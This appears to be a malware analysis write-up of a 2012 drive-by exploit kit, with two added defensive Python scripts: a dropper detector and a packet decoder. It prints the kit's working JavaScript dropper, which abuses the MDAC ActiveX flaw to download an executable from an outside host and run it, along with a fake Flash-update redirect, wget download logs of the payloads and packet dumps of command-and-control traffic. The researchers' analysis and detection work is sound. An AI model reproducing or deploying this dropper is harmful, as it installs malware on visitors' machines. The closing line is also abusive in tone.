- h = "9"
- }
- else {
- if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
- h = "8"
- }
- }
- }
- }
- }
- else {
- h = g.version
- }
- if (!d.isDefined(n)){
- n = d.getMimeEnabledPlugin(k, a)
- }
- g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1))
- }
- else {
- b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
- c = /=\s*([\d\.]+)/g;
- try {
- f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
- ""], "", g))).GetVersions();
- for (m = 0; m < 5; m ++ ){
- if (c.test(f) && (!h || RegExp.$1 > h)){
- h = RegExp.$1
- }
- }
- }
- catch (i){
- }
- g.installed = h ? 1 : (b ? 0 :- 1)
- }
- if (!g.version){
- g.version = d.formatNum(h)
- }
- g.INSTALLED[k] = g.installed
- }
- }
- , zz : 0
- }
- }
- ;
- PluginDetect.initScript();
- PluginDetect.getVersion(".");
- pdfver = PluginDetect.getVersion("AdobeReader");
- }
- catch (e){
- }
- if (typeof pdfver == 'string'){
- pdfver = pdfver.split('.')
- }
- else {
- pdfver = [0, 0, 0, 0]
- }
- function x(s){
- d = [];
- for (i = 0; i < s.length; i ++ ){
- k = (s.charCodeAt(i) - 46).toString(16);
- if (k.length == 1)k = "0" + k;
- d.push(k);
- }
- ;
- return d.join("");
- }
- end_redirect = function (){
- window.location.href = 'h00p://4.icedambusters.com/adobe/update_flash_player.exe';
- }
- ;
- window.onbeforeunload = function (){
- return "";
- }
- ;
- try {
- var ra4 = ".//..//03ab326.exe", ra3 = document.createElement("object");
- ra3.setAttribute("id", ra3);
- ra3.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
- try {
- var ra0 = ra3.CreateObject("adod".concat("b.str", "eam"), ""), ra1 = ra3.CreateObject(
- "Shell.Application", ""), ra2 = ra3.CreateObject("msxml2.XMLh00p", "");
- try {
- ra2.open("GET", "
- h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy", false);
- ra2.send();
- ra0.type = 1;
- ra0.open();
- ra0.Write(ra2.responseBody);
- ra0.SaveToFile(ra4, 2);
- ra0.Close();
- }
- catch (e){
- }
- try {
- with (ra1){
- shellexecute(ra4);
- }
- }
- catch (e){
- }
- }
- catch (e){
- }
- }
- catch (errno){
- }
- document.write('');
- setTimeout(end_redirect, 60000);
- =====================================================
- EXPLOITATION & INFECTIONS OCCURRED (PE BASED ONLY)
- ======================================================
- 1. MDAC Arbitrary file download via the Microsoft Data Access Components (MDAC) CVE-2006-0003
- ActiveX controls=BD96C556-65A3-11D0-983A-00C04FC29E36 Created adodb.stream w/shell apps
- using msxml2.XMLh00p download below malware
- using SaveToFile .//..//03ab326.exe to save malware
- --user-agent="Mozila/4.3(X11; U; MacOSX)"
- --cookies=on --keep-session-cookies --save-cookies mycookies.txt
- --referer="h00p://74.200.211.205/SQeyUUzT/js.js"
- "h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy"
- --output-document="03ab326.exe"
- --16:38:25-- h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy
- => `sample1'
- Resolving ser.luckypetspetsitting.com... 198.143.159.66
- Connecting to ser.luckypetspetsitting.com|198.143.159.66|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 256,784 (251K) [application/x-msdownload]
- 16:38:27 (157.68 KB/s) - `03ab326.exe' saved [256784/256784]
- 2. h00p://4.icedambusters.com/adobe/update_flash_player.exe
- --18:15:25-- h00p://4.icedambusters.com/adobe/update_flash_player.exe
- => `update_flash_player.exe'
- Resolving 4.icedambusters.com... 198.74.52.86
- Connecting to 4.icedambusters.com|198.74.52.86|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 256,784 (251K) [application/octet-stream]
- 18:15:28 (154.60 KB/s) - `update_flash_player.exe' saved [256784/256784] SAME LOGIC AS PREVIOUS DROPPED!
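- Added example (not part of the original paste and not the kit's code): a static triage check for the MDAC (CVE-2006-0003) dropper pattern described in item 1. It folds split string literals such as "adod".concat("b.str", "eam") before matching; the rule names, verdict labels and both sample scripts are constructed for illustration, and the sample keeps the paste's h00p defanging.

```python
import re

# A quoted JS string literal without escapes or newlines (enough for triage).
LIT = r'''(?:"[^"\\\n]*"|'[^'\\\n]*')'''
CONCAT_CALL = re.compile(
    r'(%s)\s*\.\s*concat\s*\(\s*((?:%s\s*,\s*)*%s)\s*\)' % (LIT, LIT, LIT))
PLUS_JOIN = re.compile(r'(%s)\s*\+\s*(%s)' % (LIT, LIT))


def fold_strings(js):
    """Collapse "a".concat("b", "c") and "a" + "b" into a single literal."""
    def join_concat(m):
        parts = [m.group(1)] + re.findall(LIT, m.group(2))
        return '"' + "".join(p[1:-1] for p in parts) + '"'

    def join_plus(m):
        return '"' + m.group(1)[1:-1] + m.group(2)[1:-1] + '"'

    previous = None
    while previous != js:  # every substitution shortens the text, so this ends
        previous = js
        js = CONCAT_CALL.sub(join_concat, js)
        js = PLUS_JOIN.sub(join_plus, js)
    return js


# Indicators named in item 1 above. The paste defangs "http" as "h00p" even
# inside the ProgID, so the XMLHTTP rule accepts both spellings.
RULES = [
    ("rds_dataspace_clsid",
     re.compile(r"clsid:\s*BD96C556-65A3-11D0-983A-00C04FC29E36", re.I)),
    ("adodb_stream", re.compile(r"adodb\.stream", re.I)),
    ("xmlhttp_progid", re.compile(r"msxml2\.xml(?:http|h00p)", re.I)),
    ("shell_application", re.compile(r"shell\.application", re.I)),
    ("save_to_file", re.compile(r"\.SaveToFile\s*\(", re.I)),
    ("shell_execute", re.compile(r"\bshellexecute\s*\(", re.I)),
]


def scan(js):
    """Return verdict, matched rules, and rules visible only after folding."""
    folded = fold_strings(js)
    hits = [name for name, rx in RULES if rx.search(folded)]
    hidden = [name for name, rx in RULES
              if rx.search(folded) and not rx.search(js)]
    has = set(hits).__contains__
    writes = has("adodb_stream") and has("save_to_file")
    runs = has("shell_application") or has("shell_execute")
    if has("rds_dataspace_clsid") and writes and runs:
        verdict = "mdac_dropper"      # create + download/write + execute chain
    elif has("rds_dataspace_clsid") or (writes and runs):
        verdict = "suspicious"
    else:
        verdict = "no_match"
    return {"verdict": verdict, "hits": hits, "hidden_by_splitting": hidden}


# Constructed sample, abridged from the script shown on this page; the URL is
# a placeholder, not an indicator from the paste.
SAMPLE_DROPPER = r'''
var ra4 = ".//..//03ab326.exe", ra3 = document.createElement("object");
ra3.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var ra0 = ra3.CreateObject("adod".concat("b.str", "eam"), ""),
    ra1 = ra3.CreateObject("Shell.Application", ""),
    ra2 = ra3.CreateObject("msxml2.XMLh00p", "");
ra2.open("GET", "h00p://payload-host.invalid/links/x.php", false);
ra2.send(); ra0.type = 1; ra0.open(); ra0.Write(ra2.responseBody);
ra0.SaveToFile(ra4, 2); ra0.Close();
with (ra1) { shellexecute(ra4); }
'''

# Constructed benign sample: an ActiveX availability probe like the one in
# PluginDetect's initScript, which names an XMLHTTP ProgID but writes nothing.
BENIGN_PROBE = r'''
var probes = ["Msxml2.XMLh00p", "Msxml2.DOMDocument", "Scripting.Dictionary"];
for (var i = 0; i < probes.length; i++) {
  try { new ActiveXObject(probes[i]); } catch (e) {}
}
'''

if __name__ == "__main__":
    for label, text in (("dropper", SAMPLE_DROPPER), ("probe", BENIGN_PROBE)):
        print(label, scan(text))
```

The `hidden_by_splitting` field lists the indicators a plain string search over the unfolded script would have missed.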
- ==============================================================================
- NETWORK FULL ANALYSIS of Trojan, Backdoor, Encrypt, Downloader 03ab326.exe' saved [256784/256784]
- ================================================================================
- 1) DNS : Standard query A rabbitharky.com
- 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
- 0010 00 3d 23 dc 00 00 80 11 3e c8 c0 a8 07 54 08 08 .=#..... >....T..
- 0020 08 08 04 12 00 35 00 29 cc c4 d0 20 01 00 00 01 .....5.) ... ....
- 0030 00 00 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
- 0040 6b 79 03 63 6f 6d 00 00 01 00 01 ky.com.. ...
- Standard query response A 198.143.159.66
- 0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
- 0010 00 4d 00 00 40 00 35 11 6d 94 08 08 08 08 c0 a8 .M..@.5. m.......
- 0020 07 54 00 35 04 12 00 39 47 e1 d0 20 81 80 00 01 .T.5...9 G.. ....
- 0030 00 01 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
- 0040 6b 79 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 ky.com.. ........
- 0050 01 00 00 1c 1f 00 04 c6 8f 9f 42 ........ ..B
- 2) h00p/1.0 POST: 192.168.7.84 ⇒ 198.143.159.66↓
- POST /forum/viewtopic.php h00p/1.0
- Host: rabbitharky.com
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Content-Length: 257
- Connection: close
- Content-Type: application/octet-stream
- Content-Encoding: binary
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- CRYPTED0.....?E..+...X.Q...M.....i....fx....F.hp.q.....2.=B..*..8..EA`....sj[..
- ...O...2.#Ic.4H..BE...s..$.i.,X.....o.R..Eg.y.......Kl...&..7l.........t..ws...S
- .....1...R.Pj/.Os..L2Z:.s.. C......D&.<.W`...........*
- pH...v*].....1..jw`a.....<"....4
- M.R,.._X..
- h00p/1.1 200 OK
- Server: nginx/0.7.67
- Date: Sat, 27 Oct 2012 08:17:04 GMT
- Content-Type: text/html
- Connection: close
- X-Powered-By: PHP/5.3.14-1~dotdeb.0
- 3) h00p/1.0 GET: SpringBackColorado.com/CaBPXFg.exe
- GET /CaBPXFg.exe h00p/1.0
- Host: SpringBackColorado.com
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Connection: close
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- h00p/1.1 200 OK
- Date: Sat, 27 Oct 2012 08:17:05 GMT
- Server: Apache
- Last-Modified: Sat, 27 Oct 2012 08:00:19 GMT
- Accept-Ranges: bytes
- Content-Length: 424208
- Connection: close
- Content-Type: application/x-msdownload
- PoC:
- --17:45:52-- h00p://springbackcolorado.com/CaBPXFg.exe
- => `CaBPXFg.exe'
- Resolving springbackcolorado.com... 64.29.151.221
- Connecting to springbackcolorado.com|64.29.151.221|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 424,208 (414K) [application/x-msdownload]
- 17:45:59 (60.89 KB/s) - `CaBPXFg.exe' saved [424208/424208]
- 4) h00p/1.0 GET: 180degrees.org.nz/cXbAC.exe h00p/1.0
- GET /cXbAC.exe h00p/1.0
- Host: 180degrees.org.nz
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Connection: close
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- h00p/1.1 200 OK
- Date: Sat, 27 Oct 2012 08:17:12 GMT
- Server: Apache
- Last-Modified: Sat, 27 Oct 2012 08:00:13 GMT
- Accept-Ranges: bytes
- Content-Length: 424208
- Connection: close
- Content-Type: application/x-msdownload
- PoC:
- --17:50:13-- h00p://180degrees.org.nz/cXbAC.exe
- => `cXbAC.exe'
- Resolving 180degrees.org.nz... 66.117.15.147
- Connecting to 180degrees.org.nz|66.117.15.147|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 424,208 (414K) [application/x-msdownload]
- 17:50:16 (206.57 KB/s) - `cXbAC.exe' saved [424208/424208]
- 5) h00p/1.0 GET weareseasons.com/7yoZf5.exe
- GET /7yoZf5.exe h00p/1.0
- Host: weareseasons.com
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Connection: close
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- h00p/1.1 200 OK
- Date: Sat, 27 Oct 2012 08:17:19 GMT
- Server: Apache
- Last-Modified: Sat, 27 Oct 2012 08:00:18 GMT
- ETag: "b008a82d-67910-4cd05d3c57d54"
- Accept-Ranges: bytes
- Content-Length: 424208
- Connection: close
- Content-Type: application/x-msdos-program
- PoC:
- --17:54:45-- h00p://weareseasons.com/7yoZf5.exe
- => `7yoZf5.exe'
- Resolving weareseasons.com... 87.106.194.196
- Connecting to weareseasons.com|87.106.194.196|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 424,208 (414K) [application/x-msdos-program]
- 17:54:51 (78.59 KB/s) - `7yoZf5.exe' saved [424208/424208]
- 6) CONTACTING A HOST & REJECTED: 192.168.7.84⇒108.198.141.10 TCP td-postman > 13145 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- SYN:
- 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
- 0010 00 30 26 54 40 00 80 06 12 a7 c0 a8 07 54 6c c6 .0&T@... .....Tl.
- 0020 8d 0a 04 19 33 59 ca f9 23 c4 00 00 00 00 70 02 ....3Y.. #.....p.
- 0030 40 00 5b 22 00 00 02 04 05 b4 01 01 04 02 @.[".... ......
- REPLIES:
- 0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
- 0010 00 3f 58 42 40 00 f1 06 6f a9 6c c6 8d 0a c0 a8 .?XB@... o.l.....
- 0020 07 54 33 59 04 19 00 00 00 00 ca f9 23 c5 50 14 .T3Y.... ....#.P.
- 0030 00 00 f2 a0 00 00 47 6f 20 61 77 61 79 2c 20 77 ......Go away, w
- 0040 65 27 72 65 20 6e 6f 74 20 68 6f 6d 65 e're not home
- :-)) LOLZ
- 7) SYN & ACK to Malware Host 195.169.125.228
- 195.169.125.228 192.168.7.84 TCP 13606 > cma [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- 0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
- 0010 00 28 00 00 40 00 2e 06 43 46 c3 a9 7d e4 c0 a8 .(..@... CF..}...
- 0020 07 54 35 26 04 1a 00 00 00 00 45 bf 07 2d 50 14 .T5&.... ..E..-P.
- 0030 00 00 20 1a 00 00 7e 7e 7e 7e 7e 7e .. ...~~ ~~~~
- 192.168.7.84 195.169.125.228 TCP cma > 13606 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
- 0010 00 30 26 64 40 00 80 06 ca d9 c0 a8 07 54 c3 a9 .0&d@... .....T..
- 0020 7d e4 04 1a 35 26 45 bf 07 2c 00 00 00 00 70 02 }...5&E. .,....p.
- 0030 40 00 b3 69 00 00 02 04 05 b4 01 01 04 02 @..i.... ......
- 8) KEEP ALIVE DATA SENT TO 70.138.242.12
- 192.168.7.84 70.138.242.12 TCP optima-vnet > 21913 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
- 0010 00 30 26 67 40 00 80 06 d3 cd c0 a8 07 54 46 8a .0&g@... .....TF.
- 0020 f2 0c 04 1b 55 99 0f 73 e2 af 00 00 00 00 70 02 ....U..s ......p.
- 0030 40 00 f6 b4 00 00 02 04 05 b4 01 01 04 02 @....... ......
- 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
- 0010 00 30 26 7f 40 00 80 06 d3 b5 c0 a8 07 54 46 8a .0&.@... .....TF.
- 0020 f2 0c 04 1b 55 99 0f 73 e2 af 00 00 00 00 70 02 ....U..s ......p.
- 0030 40 00 f6 b4 00 00 02 04 05 b4 01 01 04 02 @....... ......
- -------
- #MalwareMustDie!!! Crusaders Rocks!!
- Hope the malware morons, yeah, you! Choke to death after reading this & go straight to hell!!!!
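Added example, not part of the original paste: a Python decoder for the frames captured in sections 6 and 7, with the byte strings copied from the hex columns of those dumps. It bounds the TCP segment by the IP total length, which separates the 23 bytes of text carried inside the RST in section 6 from the six 0x7e bytes that follow the RST in section 7 and lie outside the IP packet. The names `decode_tcp_frame` and `rejects` are hypothetical.

```python
import socket
import struct

# Frames copied from the section 6 and 7 hex dumps (hex column only).
SYN_6 = bytes.fromhex(
    "00a0c922b0ee0012f0e93e3e08004500003026544000800612a7c0a807546cc6"
    "8d0a04193359caf923c400000000700240005b220000020405b401010402")
REPLY_6 = bytes.fromhex(
    "0012f0e93e3e00a0c922b0ee08004500003f58424000f1066fa96cc68d0ac0a8"
    "07543359041900000000caf923c550140000f2a00000476f20617761792c2077"
    "65277265206e6f7420686f6d65")
REPLY_7 = bytes.fromhex(
    "0012f0e93e3e00a0c922b0ee080045000028000040002e064346c3a97de4c0a8"
    "07543526041a0000000045bf072d50140000201a00007e7e7e7e7e7e")
FLAGS = ((0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"),
         (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG"))

def decode_tcp_frame(frame):
    """Decode one Ethernet II / IPv4 / TCP frame into a dict of fields."""
    if len(frame) < 54 or frame[12:14] != b"\x08\x00":
        raise ValueError("not an IPv4-over-Ethernet frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if (ip[0] >> 4 != 4 or ihl < 20 or ip[9] != 6
            or not ihl + 20 <= total_len <= len(ip)):
        raise ValueError("not a well-formed IPv4/TCP packet")
    # Bound TCP by the IP total length: bytes past it are link-layer
    # padding (Ethernet pads short frames), not data carried in TCP.
    tcp = ip[ihl:total_len]
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    doff = (off_flags >> 12) * 4
    if not 20 <= doff <= len(tcp):
        raise ValueError("bad TCP data offset")
    return {
        "src": (socket.inet_ntoa(ip[12:16]), sport),
        "dst": (socket.inet_ntoa(ip[16:20]), dport),
        "seq": seq, "ack": ack,
        "flags": [name for bit, name in FLAGS if off_flags & bit],
        "payload": tcp[doff:],
        "trailer": ip[total_len:],
    }

def rejects(syn, reply):
    """True if `reply` is the RST+ACK refusing the connection `syn` opened."""
    s, r = decode_tcp_frame(syn), decode_tcp_frame(reply)
    return (s["flags"] == ["SYN"] and r["flags"] == ["RST", "ACK"]
            and r["src"] == s["dst"] and r["dst"] == s["src"]
            and r["ack"] == (s["seq"] + 1) & 0xFFFFFFFF)
```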